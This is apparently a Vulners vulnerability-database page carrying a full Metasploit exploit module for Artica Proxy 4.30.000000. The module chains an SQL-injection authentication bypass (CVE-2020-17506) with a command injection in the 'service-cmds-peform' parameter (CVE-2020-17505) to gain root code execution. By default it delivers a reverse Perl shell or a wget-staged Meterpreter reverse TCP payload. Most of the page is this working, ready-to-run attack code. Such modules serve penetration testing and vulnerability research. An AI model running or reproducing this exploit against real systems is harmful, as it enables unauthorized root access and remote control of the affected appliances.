Vulners
Lucene search
Artica Proxy 4.30.000000 Authentication Bypass / Command Injection
🗓️ 22 Sep 2020 00:00:00Reported by Redouane NibouchaType 
packetstorm🔗 packetstormsecurity.com👁 295 Views
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
 | Artica Proxy 4.3.0 - Authentication Bypass Exploit | 13 Aug 202000:00 | – | zdt |
| Artica Proxy 4.30.000000 Authentication Bypass / Command Injection Exploit | 22 Sep 202000:00 | – | zdt |
 | CVE-2020-17505 | 21 Sep 202020:38 | – | circl |
| CVE-2020-17506 | 21 Sep 202020:38 | – | circl |
 | ArticaTech Artica Web Proxy SQL Injection Vulnerability | 20 Aug 202000:00 | – | cnvd |
| ArticaTech Artica Proxy Operating System Command Injection Vulnerability | 17 Aug 202000:00 | – | cnvd |
 | Artica Proxy Command Injection (CVE-2020-17505) | 18 Nov 202000:00 | – | checkpoint_advisories |
| SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465) | 18 Nov 202000:00 | – | checkpoint_advisories |
 | CVE-2020-17505 | 12 Aug 202016:33 | – | cve |
| CVE-2020-17506 | 12 Aug 202016:33 | – | cve |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection',
'Description' => %q{
This module exploits an authenticated command injection vulnerability in Artica Proxy, combined with an authentication bypass
discovered on the same version, it is possible to trigger the vulnerability without knowing the credentials.
The application runs in virtual appliance, successful exploitation of this vulnerability yields remote code execution as root on the
remote system.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Max0x4141', # discovery
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # msf module
],
'References' =>
[
['CVE', '2020-17505'], # RCE
['CVE', '2020-17506'], # Auth bypass
['EDB', '48744'],
['PACKETSTORM', '158868'],
['URL', 'https://blog.max0x4141.com/post/artica_proxy/']
],
'DefaultOptions' =>
{
'SSL' => true,
'RPort' => 9000
},
'Platform' => %w[unix linux],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Unix Command',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_command,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_perl'
}
],
[
'Linux Dropper',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
}
]
],
'Privileged' => true,
'DisclosureDate' => '2020-08-09',
'DefaultTarget' => 1,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Artica Proxy', '/']),
OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
]
)
# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end
def check
if datastore['PHPSESSID']
@phpsessid = datastore['PHPSESSID']
else
check_result = auth_bypass
return check_result unless check_result == CheckCode::Vulnerable
@phpsessid = check_result.reason
end
rand_string = Rex::Text.rand_text_alphanumeric(4..16)
if execute_command("echo #{Rex::Text.encode_base64(rand_string)}|base64 -d").include?(rand_string)
CheckCode::Appears
else
CheckCode::Safe
end
end
def execute_command(cmd, _opts = {})
print_status 'Attempting to gain RCE via CVE-2020-17505'
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
'vars_get' => {
'service-cmds-peform' => "||#{Rex::Text.uri_encode(cmd, 'hex-all')}||"
},
'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
})
res ? res.body : ''
end
def auth_bypass
serialized_object = 'a:2:{s:3:"uid";s:4:"-100";s:22:"ACTIVE_DIRECTORY_INDEX";s:1:"1";}'
apikey = "' UNION select 1,'#{Rex::Text.encode_base64(serialized_object)}';"
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'fw.login.php'),
'vars_get' => {
'apikey' => apikey
}
})
return Exploit::CheckCode::Unknown("Unable to connect to #{target_uri.path}") unless res
return Exploit::CheckCode::Safe('Authentication failed') unless res && [200, 301, 302].include?(res.code)
Exploit::CheckCode::Vulnerable(res.get_cookies[/PHPSESSID=(.+?);/, 1])
end
def exploit
if datastore['PHPSESSID']
@phpsessid = datastore['PHPSESSID']
else
print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
bypass_result = auth_bypass
case bypass_result
when CheckCode::Safe then fail_with(Failure::NoAccess, bypass_result.reason)
when CheckCode::Unknown then fail_with(Failure::Unknown, bypass_result.reason)
else @phpsessid = bypass_result.reason
end
end
print_good "Session cookie : #{@phpsessid}"
case target['Type']
when :unix_command then execute_command(payload.encoded)
when :linux_dropper then execute_cmdstager
else
fail_with(Failure::BadConfig, 'Invalid target specified')
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Sep 2020 00:00Current
1.1Low risk
Vulners AI Score1.1
EPSS0.91971